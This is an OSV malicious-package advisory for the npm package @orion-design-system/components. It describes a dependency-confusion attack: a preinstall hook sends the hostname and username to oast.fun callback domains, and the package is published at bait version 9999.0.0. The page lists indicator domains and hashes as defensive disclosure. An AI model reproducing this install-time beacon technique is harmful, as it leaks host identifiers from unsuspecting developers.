MAL-2026-5522
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@orion-design-system/components/MAL-2026-5522.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5522
- Published
- 2026-06-10T18:22:00Z
- Modified
- 2026-06-11T00:16:29.523152335Z
- Summary
- Malicious code in @orion-design-system/components (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f)
package.json declares a
preinstallhook that runs an inlinenode -escript readingos.hostname()andos.userInfo().usernameand transmitting them via HTTPS GET (and a DNS lookup) tod8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun, an interactsh/OAST callback subdomain not controlled by the installer. The hook fires automatically onnpm install, with no opt-out. The package is published under the@orion-design-systemscope at version9999.0.0— the canonical dependency-confusion bait version — and the README names Cloud Imperium Games / Roberts Space Industries as the intended target, confirming the package is positioned to be resolved over a private internal package of the same name. Any installer whose resolver picks the public version (intentionally or via misconfiguration) leaks host identifiers to a third-party collection endpoint on install. The9999.0.0version pin combined with the scope-targeted README and unconditional install-time beacon places this firmly in the active-attack / dependency-confusion-exfil pattern, regardless of anyresearchframing. - Database specific
{ "malicious-packages-origins": [ { "modified_time": "2026-06-10T18:22:00Z", "versions": [ "9999.0.2" ], "sha256": "5b2f8f861c74d508ab4b8c3716b24502c9b7d9576a1a7d5a12d943c8689a8aa6", "id": "IN-MAL-2026-005266", "source": "amazon-inspector", "import_time": "2026-06-10T19:23:46.785502526Z" }, { "modified_time": "2026-06-10T18:23:01Z", "versions": [ "9999.0.0" ], "sha256": "edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f", "id": "IN-MAL-2026-005277", "source": "amazon-inspector", "import_time": "2026-06-10T19:23:47.439615066Z" }, { "modified_time": "2026-06-10T18:22:46Z", "versions": [ "9999.0.1" ], "sha256": "fa4498f70425b07b70b45e690ec9bd4df39e2331b867b38f6c514fdace564d9a", "id": "IN-MAL-2026-005272", "source": "amazon-inspector", "import_time": "2026-06-10T19:23:47.141951991Z" }, { "modified_time": "2026-06-10T18:22:45Z", "versions": [ "9999.0.1" ], "sha256": "613c244d661e5d4c24917f7b5f875ae3ba06702e87bb39e87c536a069a4bfdfd", "id": "IN-MAL-2026-005271", "source": "amazon-inspector", "import_time": "2026-06-10T19:23:47.09525798Z" }, { "modified_time": "2026-06-10T18:23:02Z", "versions": [ "9999.0.0" ], "sha256": "7c720b8affc812f8715ba3276062643ae5cdf7f33e1fdb2d9b7f863aed37b265", "id": "IN-MAL-2026-005278", "source": "amazon-inspector", "import_time": "2026-06-10T19:23:47.503943982Z" }, { "modified_time": "2026-06-10T18:22:00Z", "versions": [ "9999.0.2" ], "sha256": "9bb4e5dc245e5190ba0541c3743ac690169de2eb2aff99bdba66f827d9233b65", "id": "IN-MAL-2026-005265", "source": "amazon-inspector", "import_time": "2026-06-10T19:23:46.713464407Z" }, { "modified_time": "2026-06-10T23:32:00Z", "versions": [ "9999.0.3" ], "sha256": "c77b1552ac6270761850a9f7f42c3eea13802392e2684f7093da3dcba4b11196", "id": "IN-MAL-2026-005307", "source": "amazon-inspector", "import_time": "2026-06-11T00:00:56.874208606Z" }, { "modified_time": "2026-06-10T23:31:59Z", "versions": [ "9999.0.3" ], "sha256": "cace6502c119f3fc25871413e4600fe6c4a278186974e38cae72390e11769379", "id": "IN-MAL-2026-005306", "source": "amazon-inspector", "import_time": "2026-06-11T00:00:56.78812158Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / @orion-design-system/components
Package
- Name
- @orion-design-system/components
- View open source insights on deps.dev
- Purl
- pkg:npm/%40orion-design-system%2Fcomponents
Database specific
indicators
{
"domains": [
"bzexvuarrenmkxiyjrichx8eaxwssgv0x.oast.fun",
"orion-components.scan-9c76f414b7ee.bzexvuarrenmkxiyjrichx8eaxwssgv0x.oast.fun"
],
"evidence_files": [
{
"sha256": "fd725b830e409f5f9ce4266ef67a551dc04c2717c2f48d40421753e04cc9b452",
"tlsh": "cb019978062098331dd644f403ba691bb1f3da86c9d55c0adae741c5a3ca7f127ba075",
"path": "package.json"
}
],
"package_integrity": [
{
"filename": "components-9999.0.0.tgz",
"hashes": {
"sha512_sri": "sha512-vk7A+KG+nSHeyeIFS2dnWSRfHK1GcUNy6KeaxA9CccY1e9x0tQSFdoPqFaEVVpzRwv8j6/teTodSIPJbJqtSbg==",
"sha1": "20278b5365b66eac2b5b32456d52ea1c36ab9d90"
}
}
]
}
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@orion-design-system/components/MAL-2026-5522.json"